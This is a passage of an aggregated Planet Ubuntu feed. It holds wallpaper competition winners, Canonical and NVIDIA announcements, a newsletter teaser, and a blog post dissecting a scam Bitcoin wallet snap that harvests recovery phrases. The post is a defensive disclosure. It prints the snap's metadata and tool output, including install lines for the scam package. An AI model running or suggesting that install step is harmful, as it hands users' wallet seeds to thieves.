<noscript>
<img alt="" height="900" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1600,h_900/https://ubuntu.com/wp-content/uploads/c919/noble1.png" width="1600" />
</noscript>
</div>
</figure>
<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="900" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1600,h_900/https://ubuntu.com/wp-content/uploads/9a13/noble-dark.png" width="1600" />
</noscript>
</div>
</figure>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/f8ee84cd-noble-numbat-wallpaper-light.png" width="720" />
</noscript>
</div>
</figure>
<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="900" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1600,h_900/https://ubuntu.com/wp-content/uploads/9bd7/noble-medium.png" width="1600" />
</noscript>
</div>
</figure>
<h2 class="wp-block-heading">Art of the round table</h2>
<p>This majestic wallpaper will be joined by a collection of others from the current incarnation of the <a href="https://discourse.ubuntu.com/t/noble-numbat-24-04-wallpaper-competition/42300">Ubuntu Wallpaper Competition</a>. This year’s competition has attracted other Numbat contestants, exciting scenery from the land of the Numbat, and abstract art in honor of their majesty. We cordially invite you to behold the distinguished recipients of this year’s accolades:</p>
<h3 class="wp-block-heading">Mascot</h3>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/091702e2-community_wallpaper_noble_fuwafuwa_nanbatto_san_by_amaral.jpeg" width="720" />
</noscript>
</div>
Fuwafuwa Nanbatto-san by <a href="https://discourse.ubuntu.com/u/amaral">@amaral</a></figure>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/0ecd2ffd-community_wallpaper_noble_little_numbat_boy_by_azskalt.jpeg" width="720" />
</noscript>
</div>
Little numbat boy by <a href="https://discourse.ubuntu.com/u/azskalt" rel="noreferrer noopener" target="_blank">@azskalt</a></figure>
<h3 class="wp-block-heading">Digital art</h3>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/63c50fde-community_wallpaper_noble_province_of_the_south_of_france_by_orbitelambda.jpeg" width="720" />
</noscript>
</div>
Province of the South of France by <a href="https://discourse.ubuntu.com/u/orbitelambda">@orbitelambda</a></figure>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/802d8cc9-community_wallpaper_noble_monument_valley_by_orbitelambda.jpg" width="720" />
</noscript>
</div>
Monument Valley (Arizona) by <a href="https://discourse.ubuntu.com/u/orbitelambda">@orbitelambda</a></figure>
<h3 class="wp-block-heading">Nature</h3>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/070a4d72-community_wallpaper_noble_mount_fuji_by_amaral.jpg" width="720" />
</noscript>
</div>
Mount Fuji, Japan by <a href="https://discourse.ubuntu.com/u/amaral">@amaral</a></figure>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/cee4ad9f-community_wallpaper_noble_northan_lights_by_mizuno-as.jpg" width="720" />
</noscript>
</div>
Northan Lights by <a href="https://discourse.ubuntu.com/u/mizuno-as">@mizuno-as</a></figure>
<h3 class="wp-block-heading">Others</h3>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/260fd557-community_wallpaper_noble_lightbulb_rainbow_by_audioaddict.jpg" width="720" />
</noscript>
</div>
Lightbulb Rainbow by <a href="https://discourse.ubuntu.com/u/audioaddict">@audioaddict</a></figure>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/8a7454ac-community_wallpaper_noble_clouds_by_moka-hun.jpeg" width="720" />
</noscript>
</div>
Clouds by <a href="https://discourse.ubuntu.com/u/moka-hun">@moka-hun</a></figure>
<h2 class="wp-block-heading">Get involved</h2>
<p>In the grand tapestry of our Ubuntu realm, the Ubuntu Wallpaper Competition stands as one avenue for you, esteemed allies and artisans, to contribute to our vibrant community. I invite you to explore the many ways to join our collective endeavor. Venture to <a href="https://ubuntu.com/community/contribute">https://ubuntu.com/community/contribute</a> and enrich Ubuntu with your creativity and collaboration.</p>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Canonical accelerates AI Application Development with NVIDIA AI Enterprisehttps://ubuntu.com//blog/charmed-k8s-support-comes-to-nvidia-ai-enterprise2024-03-18T22:10:00+00:00<h1 class="wp-block-heading">Charmed Kubernetes support comes to NVIDIA AI Enterprise</h1>
<p>Canonical’s Charmed Kubernetes is now supported on <a href="https://www.nvidia.com/en-us/data-center/products/ai-enterprise/">NVIDIA AI Enterprise 5.0</a>. Organisations using Kubernetes deployments on Ubuntu can look forward to a seamless licensing migration to the latest release of the <a href="https://www.nvidia.com/en-us/data-center/products/ai-enterprise/">NVIDIA AI Enterprise</a> software platform providing developers the latest AI models and optimised runtimes.</p>
<h2 class="wp-block-heading">NVIDIA AI Enterprise 5.0</h2>
<p>NVIDIA AI Enterprise 5.0 is supported across workstations, data centres, and cloud deployments, new updates include:</p>
<ul>
<li>NVIDIA NIM microservices is a set of cloud-native microservices developers can use as building blocks to support custom AI application development and speed production AI, and will be supported on Charmed Kubernetes.</li>
<li><a href="http://ai.nvidia.com">NVIDIA API catalog</a>: providing quick access for enterprise developers to experiment, prototype and test NVIDIA-optimised foundation models powered by NIM. When ready to deploy, enterprise developers can export the enterprise-ready API and run on a self-hosted system</li>
<li>Infrastructure management enhancements include support for vGPU heterogeneous profiles, Charmed Kubernetes, and new GPU platforms.</li>
</ul>
<h2 class="wp-block-heading">Charmed Kubernetes and NVIDIA AI Enterprise 5.0</h2>
<p>Data scientists and developers leveraging NVIDIA frameworks and workflows on Ubuntu across the board now have a single platform to rapidly develop AI applications on the latest generation NVIDIA Tensor Core GPUs. For data scientists and AI/ML developers who would like to deploy their latest AI workloads using kubernetes, it is vital to leverage the most performance out of Tensor Core GPUs through NVIDIA drivers and integrations.</p>
<div class="wp-block-image">
<figure class="aligncenter">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/qafLgDmRQlzyQ_96dYJkeUBiPT1iFHcgQjCevEw1QxqCd9vCofG6dnWYpsKUrR9RMzM-hZyzZVOoRdim2moXMzT-4v5aTsennEU0cQfWClkWDhuTyszEDTxskryrIE_42oO3N215u0o" width="720" />
</noscript>
</div>
Fig. NVIDIA AI Enterprise 5.0</figure></div>
<p>With Charmed Kubernetes from Canonical, several features are provided that are unique to this distribution including inclusion of NVIDIA operators and GPU optimisation features, composability and extensibility using customised integrations through Ubuntu operating system.</p>
<h2 class="wp-block-heading">Best-In-Class Kubernetes from Canonical </h2>
<p>Charmed Kubernetes can automatically detect GPU-enabled hardware and install required drivers from NVIDIA repositories. With the release of Charmed Kubernetes 1.29, the <a href="https://charmhub.io/nvidia-gpu-operator?channel=1.29/stable">NVIDIA GPU Operator charm</a> is available for specific GPU configuration and tuning. With support for GPU operators in Charmed K8s, organisations can rapidly and repeatedly deploy the same models utilising existing on-prem or cloud infrastructure to power AI workloads. </p>
<p>With the NVIDIA GPU operator, users can automatically detect the GPU on the system and install NVIDIA repositories. It also allows for the most optimal configurations through features such as <a href="https://www.nvidia.com/en-us/technologies/multi-instance-gpu/">NVIDIA Multi-Instance GPU</a> (MIG) technology in order to leverage the most efficiency out of the Tensor Core GPUs. GPU-optimised instances for AI/ML applications reduce latency and allow for more data processing, freeing for larger-scale applications and more complex model deployment. </p>
<p>Paired with the GPU Operator, the Network Operator enables GPUDirect RDMA (GDR), a key technology that accelerates cloud-native AI workloads by orders of magnitude. GDR allows for optimised network performance, by enhancing data throughput and reducing latency. Another distinctive advantage is its seamless compatibility with NVIDIA’s ecosystem, ensuring a cohesive experience for users. Furthermore, its design, tailored for Kubernetes, ensures scalability and adaptability in various deployment scenarios. This all leads to more efficient networking operations, making it an invaluable tool for businesses aiming to harness the power of GPU-accelerated networking in their Kubernetes environments.</p>
<p>Speaking about these solutions, Marcin “Perk” Stożek, Kubernetes Product Manager at Canonical says: “Charmed Kubernetes validation with NVIDIA AI Enterprise is an important step towards an enterprise-grade, end-to-end solution for AI workloads. By integrating NVIDIA Operators with Charmed Kubernetes, we make sure that customers get what matters to them most: efficient infrastructure for their generative AI workloads.” </p>
<p>Getting started is easy (and free). You can rest assured that Canonical experts are available to help if required.</p>
<h2 class="wp-block-heading">Get started with Canonical open source solutions with NVIDIA AI Enterprise </h2>
<p>Try out NVIDIA AI Enterprise with Charmed Kubernetes with a free, 90-day <a href="http://www.nvidia.com/ai-enterprise-eval">evaluation</a></p>
<ul>
<li><a href="https://docs.nvidia.com/nvidia-ai-enterprise-and-charmed-kubernetes-deployment-guide.pdf">NVIDIA AI Enterprise and Charmed Kubernetes Deployment Guide</a></li>
<li>Check out more information about <a href="https://ubuntu.com/nvidia">Canonical and NVIDIA’s efforts to help enterprises adopt AI</a></li>
<li>Canonical software is validated as part of the <a href="https://www.nvidia.com/en-us/data-center/dgx-ready-software/">NVIDIA DGX-Ready Software program</a></li>
<li>GPU acceleration, <a href="https://ubuntu.com/kubernetes/docs/gpu-workers">using GPU workers</a></li>
<li>NVIDIA integration <a href="https://microk8s.io/docs/addon-gpu">GPU operator and MIG</a></li>
<li>Solution brief: <a href="https://ubuntu.com/engage/kubernetes-by-canonical-delivered-on-nvidia-dgx-systems">Kubernetes by Canonical delivered on NVIDIA DGX systems</a></li>
</ul>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Accelerate AI development with Ubuntu and NVIDIA AI Workbenchhttps://ubuntu.com//blog/accelerate-ai-development-with-ubuntu-and-nvidia-ai-workbench2024-03-18T22:10:00+00:00<div class="wp-block-image">
<figure class="aligncenter">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/A_HSmF3YJY7LbaSsFWcwJLdGiA6MnAi0cCqmtDYmAXd9SE4B5u4AZZ14WVrokXR0VGrG0r_gG6LkQBgXODhC5ZIT9dLt5WvErPgVEoqwFi3HCF15wWDxp7gRE02-IkzqAJt0k5O7zNzwQ-XEC4VhPA" width="720" />
</noscript>
</div>
Fig.1. NVIDIA AI Workbench</figure></div>
<p>Canonical expands its collaboration with NVIDIA through NVIDIA AI Workbench. NVIDIA AI Workbench is supported across workstations, data centres, and cloud deployments.</p>
<p>NVIDIA AI Workbench is an easy-to-use toolkit that allows developers to create, test, and customise AI and machine learning models on their PC or workstation and scale them to the data centre or public cloud. It simplifies interactive development workflows while automating technical tasks that halt beginners and derail experts. Collaborative AI and ML development is now possible on any platform – and for any skill level. </p>
<p>As the preferred OS for data science, artificial intelligence and machine learning, Ubuntu and Canonical play an integral role in AI Workbench capabilities. </p>
<ul>
<li>On Windows, Ubuntu powers AI Workbench via WSL2. </li>
<li>In the cloud, Ubuntu 22.04 LTS enables AI Workbench cloud deployments as the only target OS supported for remote machines. </li>
<li>For AI application deployments from the datacenter to cloud to edge, Ubuntu-based containers are included as a key part of AI Workbench.</li>
</ul>
<p>This seamless end user experience is made possible thanks to the partnership between Canonical and NVIDIA.</p>
<h2 class="wp-block-heading">Define your AI journey, start local and scale globally</h2>
<p>Create, collaborate, and reproduce generative AI and data science projects with ease. Develop and execute while NVIDIA AI Workbench handles the rest:</p>
<ul>
<li><strong>Streamlined setup</strong>: easy installation and configuration of containerized development environments for GPU-accelerated hardware.</li>
<li><strong>Laptop to cloud</strong>: start locally on a RTX PC or workstation and scale out to data centre or cloud in just a few clicks.</li>
<li><strong>Automated workflow management</strong>: simplified management of project resources, versioning, and dependency tracking.</li>
</ul>
<div class="wp-block-image">
<figure class="aligncenter">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/-EfBv9zbee0oO4GP3pn1BshghxzEY-nkQzA2UKs-3AhtG1UHRto_n1-LTitJ9YCp0XEhry_s6TCRMGoJ7aNMY7DvrHOaSnEZEwLEuveXo6GicOqjuHqi4eWB-SKU8i9bSr6_YKtG9w-iFybrLWN7nQ" width="720" />
</noscript>
</div>
Fig 2. Environment Window in AI Workbench Desktop App</figure></div>
<h2 class="wp-block-heading">Ubuntu and NVIDIA AI Workbench improve the end user experience for Generative AI workloads on client machines</h2>
<p>As the established OS for data science, Ubuntu is now commonly being used for AI/ML development and deployment purposes. This includes development, processing, and iterations of Generative AI (GenAI) workloads. GenAI on both smaller devices and GPUs is increasingly important with the growth of edge AI applications and devices. Applications such as smart cities require more edge devices such as cameras and sensors and thus require more data to be processed at the edge. To make it easier for end users to deploy workloads with more customisability, Ubuntu containers are often preferred due to their ease of use for bare metal deployments. NVIDIA AI Workbench offers Ubuntu container options that are well integrated and suited for GenAI use cases.</p>
<div class="wp-block-image">
<figure class="aligncenter">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/xp2N0FrI5yUtEwGTbxkrDp1USeMgoL1Wo5O72Lqm4mXzSd6Uv-TulZfsilYc9YHynFb3EEq2ln-KAp0KWsgLBTL4OXhpPyUVsC9MAdAxT4IweW4TeE1YNyRO2K0tah-I7Tk2H43t7w_hjfiXN7hIIA" width="720" />
</noscript>
</div>
Fig 3. AI Workbench Development Workflow</figure></div>
<h2 class="wp-block-heading">Peace of mind with Ubuntu LTS</h2>
<p>With Ubuntu, developers benefit from Canonical’s 20-year track record of Long Term Supported releases, delivering security updates and patching for 5 years. With <a href="https://ubuntu.com/pro">Ubuntu Pro</a>, organisations can extend that support and security maintenance commitment to 10 years to offload security and compliance from their team so you can focus on building great models. Together, Canonical and Ubuntu provide an optimised and secure environment for AI innovators wherever they are. </p>
<p><a href="https://www.nvidia.com/en-us/deep-learning-ai/solutions/data-science/workbench/">Getting started</a> is easy (and free).</p>
<h2 class="wp-block-heading">Get started with Canonical Open Source AI Solutions</h2>
<ul>
<li>Check out more information about <a href="https://ubuntu.com/nvidia">Canonical and NVIDIA’s efforts to help enterprises adopt AI</a>.</li>
<li>Canonical software is validated as part of the <a href="https://www.nvidia.com/en-us/data-center/dgx-ready-software/">NVIDIA DGX-Ready Software program</a>.</li>
<li>Download the <a href="https://ubuntu.com/engage/run-ai-at-scale">Run AI at scale whitepaper </a>to learn how to build your performant ML stack with NVIDIA DGX and Kubeflow.</li>
<li>Check out more information about <a href="https://www.nvidia.com/en-us/deep-learning-ai/solutions/data-science/workbench/">AI Workbench</a>.</li>
</ul>Ubuntu developershttp://planet.ubuntu.com/The Fridge: Ubuntu Weekly Newsletter Issue 831https://fridge.ubuntu.com/?p=101172024-03-18T21:08:51+00:00<figure class="wp-block-image"><img alt="" src="https://fridge.ubuntu.com/wp-content/uploads/2020/02/c9d7/header.png" /></figure>
<p>Welcome to the Ubuntu Weekly Newsletter, <strong>Issue 831 for the week of March 10 – 16, 2024</strong>. The full version of this issue is available <a href="https://discourse.ubuntu.com/t/ubuntu-weekly-newsletter-issue-831/43245">here</a>.</p>
<p>In this issue we cover:</p>
<ul><li>Welcome New Members and Developers</li><li>Ubuntu Stats</li><li>Hot in Support</li><li>UbuCon Asia 2024 – Call for proposals</li><li>Catalan Team: Call for participation in the Noble Festival</li><li>LoCo Events</li><li>Ubuntu Quality – Communications and Testing Practices</li><li>Other Community News</li><li>Ubuntu Cloud News</li><li>Canonical News</li><li>In the Press</li><li>In the Blogosphere</li><li>Other Articles of Interest</li><li>Featured Audio and Video</li><li>Meeting Reports</li><li>Upcoming Meetings and Events</li><li>Updates and Security for Ubuntu 20.04, 22.04, and 23.10</li><li>And much more!</li></ul>
<p><strong>The Ubuntu Weekly Newsletter is brought to you by:</strong></p>
<ul><li>Krytarik Raido</li><li>Bashing-om</li><li>Chris Guiver</li><li>Wild Man</li><li>And many others</li></ul>
<p>If you have a story idea for the Weekly Newsletter, join the <a href="https://lists.ubuntu.com/mailman/listinfo/Ubuntu-news-team">Ubuntu News Team mailing list</a> and submit it. Ideas can also be added to the <a href="https://wiki.ubuntu.com/UbuntuWeeklyNewsletter/Ideas">wiki</a>!</p>
<div class="wp-block-image"><figure class="alignleft"><img alt="" src="https://fridge.ubuntu.com/wp-content/uploads/2015/05/ab28/CCL.png" /></figure></div>
<p></p>Ubuntu developershttp://planet.ubuntu.com/Alan Pope: Guess Who's Back? Exodus Scam BitCoin Wallet Snap!https://popey.com/blog/2024/03/exodus-wallet-part-three/2024-03-18T20:00:00+00:00<h2 id="previously">Previously…</h2>
<p>Back in February, I <a href="https://popey.com/blog/blog/2024/02/exodus-bitcoin-wallet-490k-swindle/">blogged</a> about a series of scam Bitcoin wallet apps that were published in the Canonical Snap store, including one which netted a scammer <strong>$490K</strong> of some poor rube’s coin.</p>
<p>The snap was <em>eventually</em> <a href="https://popey.com/blog/blog/2024/02/exodus-bitcoin-wallet-follow-up">removed</a>, and <a href="https://forum.snapcraft.io/t/should-unverified-cryptocurrency-apps-be-banned/38919/4">some</a> <a href="https://forum.snapcraft.io/t/stronger-identity-verification-for-all-publishers/39061">threads</a> were started over on the <a href="https://snapcraft.io/">Snapcraft forum</a></p>
<h2 id="groundhog-day">Groundhog Day</h2>
<p>Nothing has changed it seems, because once again, <strong>ANOTHER</strong> <strong>TEN</strong> scam BitCoin wallet apps have been published in the Snap Store today.</p>
<p><a href="https://www.youtube.com/watch?v=H6-IQAdFU3w"><img alt="You’re joking! Not another one!" src="https://popey.com/blog/blog/images/2024-03-18/not-another-one.gif" /></a></p>
<p>Yes, Brenda!</p>
<p>This one has the snappy (sorry) name of <code>exodus-build-96567</code> published by that not-very-legit looking publisher <code>digisafe00000</code>. Uh-huh.</p>
<p><strong>Edit</strong>: Initially I wrote this post after analysing one of the snaps I stumbled upon. It’s been pointed out there’s a whole bunch under this account. All with popular crypto wallet brand names.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/publisher-1_50.png"><img alt="Publisher digisafe00000" src="https://popey.com/blog/blog/images/2024-03-18/publisher-1.png" /></a></p>
<p><strong>Edit</strong>: These were removed. <strong>One day later</strong>, they popped up <strong>again</strong>, under a new account. I reported all of them, and pinged someone at Canonical to get them removed.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-19/codeshield0x0000_50.png"><img alt="Publisher codeshield0x0000" src="https://popey.com/blog/blog/images/2024-03-19/codeshield0x0000.png" /></a></p>
<p>There’s no indication this is the same developer as the last scam Exodus Wallet snap published in February, or the one published back in November last year.</p>
<h2 id="presentation">Presentation</h2>
<p>Here’s what it looks like on the Snap Store page <a href="https://snapcraft.io/exodus-build-96567">https://snapcraft.io/exodus-build-96567</a> - which may be gone by the time you see this. A real <em>minimum effort</em> on the store listing page here. But I’m sure it could fool someone, they usually do.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/snap-store-1.png"><img alt="A not very legit looking snap" src="https://popey.com/blog/blog/images/2024-03-18/snap-store-1_50.png" /></a></p>
<p>It also shows up in searches within the desktop graphical storefront “Ubuntu Software” or “App Centre”, making it super easy to install.</p>
<p><strong>Note:</strong> Do <strong>not</strong> install this.</p>
<p>“<em>Secure, Manage, and Swap all your favorite assets</em>.” None of that is true, as we’ll see later. Although one could argue “swap” is true if you don’t mind “swapping” all your BitCoin for an empty wallet, I suppose.</p>
<p>Although it is “<em>Safe</em>”, apparently, according to the store listing.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/snap-store-2.png"><img alt="Coming to a desktop near you" src="https://popey.com/blog/blog/images/2024-03-18/snap-store-2_50.png" /></a></p>
<h2 id="open-wide">Open wide</h2>
<p>It looks like the <code>exodus-build-96567</code> snap was only published to the store today. I wonder what happened to builds 1 through 96566!</p>
<div class="highlight"><pre tabindex="0"><code class="language-bash"><span style="display: flex;"><span>$ snap info
</span></span><span style="display: flex;"><span>name: exodus-build-96567
</span></span><span style="display: flex;"><span>summary: Secure, Manage, and Swap all your favorite assets.
</span></span><span style="display: flex;"><span>publisher: Digital Safe <span style="color: #f92672;">(</span>digisafe00000<span style="color: #f92672;">)</span>
</span></span><span style="display: flex;"><span>store-url: https://snapcraft.io/exodus-build-96567
</span></span><span style="display: flex;"><span>license: unset
</span></span><span style="display: flex;"><span>description: |
</span></span><span style="display: flex;"><span> Forget managing a million different wallets and seed phrases.
</span></span><span style="display: flex;"><span> Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
</span></span><span style="display: flex;"><span>snap-id: wvexSLuTWD9MgXIFCOB0GKhozmeEijHT
</span></span><span style="display: flex;"><span>channels:
</span></span><span style="display: flex;"><span> latest/stable: 8.6.5 2024-03-18 <span style="color: #f92672;">(</span>1<span style="color: #f92672;">)</span> 565kB -
</span></span><span style="display: flex;"><span> latest/candidate: ↑
</span></span><span style="display: flex;"><span> latest/beta: ↑
</span></span><span style="display: flex;"><span> latest/edge: ↑
</span></span></code></pre></div><p>Here’s the app running in a VM.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/exodus-wallet-2.png"><img alt="The application" src="https://popey.com/blog/blog/images/2024-03-18/exodus-wallet-2_50.png" /></a></p>
<p>If you try and create a new wallet, it waits a while then gives a spurious error. That code path likely does nothing. What it really wants you to do is “Add an existing wallet”.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/exodus-wallet-1.png"><img alt="Give us all your money" src="https://popey.com/blog/blog/images/2024-03-18/exodus-wallet-1_50.png" /></a></p>
<p>As with all these scam application, all it does is ask for a BitCoin recovery phrase, and with that will likely steal all the coins and send them off to the scammer’s wallet. Obviously I didn’t test this with a real wallet phrase.</p>
<p>When given a false passphrase/recovery-key it calls some remote API then shows a dubious error, having already taken your recovery key, and sent it to the scammer.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/error-1.png"><img alt="Error" src="https://popey.com/blog/blog/images/2024-03-18/error-1_50.png" /></a></p>
<h2 id="whats-inside">What’s inside?</h2>
<p>While the snap is still available for download from the store, I grabbed it.</p>
<div class="highlight"><pre tabindex="0"><code class="language-bash"><span style="display: flex;"><span>$ snap download exodus-build-96567
</span></span><span style="display: flex;"><span>Fetching snap <span style="color: #e6db74;">"exodus-build-96567"</span>
</span></span><span style="display: flex;"><span>Fetching assertions <span style="color: #66d9ef;">for</span> <span style="color: #e6db74;">"exodus-build-96567"</span>
</span></span><span style="display: flex;"><span>Install the snap with:
</span></span><span style="display: flex;"><span> snap ack exodus-build-96567_1.assert
</span></span><span style="display: flex;"><span> snap install exodus-build-96567_1.snap
</span></span></code></pre></div><p>I then unpacked the snap to take a peek inside.</p>
<div class="highlight"><pre tabindex="0"><code class="language-bash"><span style="display: flex;"><span>unsquashfs exodus-build-96567_1.snap
</span></span><span style="display: flex;"><span>Parallel unsquashfs: Using <span style="color: #ae81ff;">8</span> processors
</span></span><span style="display: flex;"><span><span style="color: #ae81ff;">11</span> inodes <span style="color: #f92672;">(</span><span style="color: #ae81ff;">21</span> blocks<span style="color: #f92672;">)</span> to write
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">[===========================================================</span>|<span style="color: #f92672;">]</span> 32/32 100%
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span>created <span style="color: #ae81ff;">11</span> files
</span></span><span style="display: flex;"><span>created <span style="color: #ae81ff;">8</span> directories
</span></span><span style="display: flex;"><span>created <span style="color: #ae81ff;">0</span> symlinks
</span></span><span style="display: flex;"><span>created <span style="color: #ae81ff;">0</span> devices
</span></span><span style="display: flex;"><span>created <span style="color: #ae81ff;">0</span> fifos
</span></span><span style="display: flex;"><span>created <span style="color: #ae81ff;">0</span> sockets
</span></span><span style="display: flex;"><span>created <span style="color: #ae81ff;">0</span> hardlinks
</span></span></code></pre></div><p>There’s not a lot in here. Mostly the usual snap scaffolding, metadata, and the single <code>exodus-bin</code> application binary in <code>bin/</code>.</p>
<div class="highlight"><pre tabindex="0"><code class="language-bash"><span style="display: flex;"><span>tree squashfs-root/
</span></span><span style="display: flex;"><span>squashfs-root/
</span></span><span style="display: flex;"><span>├── bin
</span></span><span style="display: flex;"><span>│ └── exodus-bin
</span></span><span style="display: flex;"><span>├── meta
</span></span><span style="display: flex;"><span>│ ├── gui
</span></span><span style="display: flex;"><span>│ │ ├── exodus-build-96567.desktop
</span></span><span style="display: flex;"><span>│ │ └── exodus-build-96567.png
</span></span><span style="display: flex;"><span>│ ├── hooks
</span></span><span style="display: flex;"><span>│ │ └── configure
</span></span><span style="display: flex;"><span>│ └── snap.yaml
</span></span><span style="display: flex;"><span>└── snap
</span></span><span style="display: flex;"><span> ├── command-chain
</span></span><span style="display: flex;"><span> │ ├── desktop-launch
</span></span><span style="display: flex;"><span> │ ├── hooks-configure-fonts
</span></span><span style="display: flex;"><span> │ └── run
</span></span><span style="display: flex;"><span> ├── gui
</span></span><span style="display: flex;"><span> │ ├── exodus-build-96567.desktop
</span></span><span style="display: flex;"><span> │ └── exodus-build-96567.png
</span></span><span style="display: flex;"><span> └── snapcraft.yaml
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span><span style="color: #ae81ff;">8</span> directories, <span style="color: #ae81ff;">11</span> files
</span></span></code></pre></div><p>Here’s the <code>snapcraft.yaml</code> used to build the package. Note it needs network access, unsurprisingly.</p>
<div class="highlight"><pre tabindex="0"><code class="language-yaml"><span style="display: flex;"><span><span style="color: #f92672;">name</span>: <span style="color: #ae81ff;">exodus-build-96567</span> <span style="color: #75715e;"># you probably want to 'snapcraft register <name>'</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">base</span>: <span style="color: #ae81ff;">core22</span> <span style="color: #75715e;"># the base snap is the execution environment for this snap</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">version</span>: <span style="color: #e6db74;">'8.6.5'</span> <span style="color: #75715e;"># just for humans, typically '1.2+git' or '1.3.2'</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">title</span>: <span style="color: #ae81ff;">Exodus Wallet</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">summary</span>: <span style="color: #ae81ff;">Secure, Manage, and Swap all your favorite assets.</span> <span style="color: #75715e;"># 79 char long summary</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">description</span>: |<span style="color: #e6db74;">
</span></span></span><span style="display: flex;"><span><span style="color: #e6db74;"> Forget managing a million different wallets and seed phrases.
</span></span></span><span style="display: flex;"><span><span style="color: #e6db74;"> Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.</span>
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">grade</span>: <span style="color: #ae81ff;">stable</span> <span style="color: #75715e;"># must be 'stable' to release into candidate/stable channels</span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">confinement</span>: <span style="color: #ae81ff;">strict</span> <span style="color: #75715e;"># use 'strict' once you have the right plugs and slots</span>
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">apps</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">exodus-build-96567</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">command</span>: <span style="color: #ae81ff;">bin/exodus-bin</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">extensions</span>: [<span style="color: #ae81ff;">gnome]</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">plugs</span>:
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">network</span>
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">unity7</span>
</span></span><span style="display: flex;"><span> - <span style="color: #ae81ff;">network-status</span>
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">layout</span>:
</span></span><span style="display: flex;"><span> <span style="color: #ae81ff;">/usr/lib/${SNAPCRAFT_ARCH_TRIPLET}/webkit2gtk-4.1:</span>
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">bind</span>: <span style="color: #ae81ff;">$SNAP/gnome-platform/usr/lib/$SNAPCRAFT_ARCH_TRIPLET/webkit2gtk-4.0</span>
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">parts</span>:
</span></span><span style="display: flex;"><span> <span style="color: #f92672;">exodus-build-96567</span>:
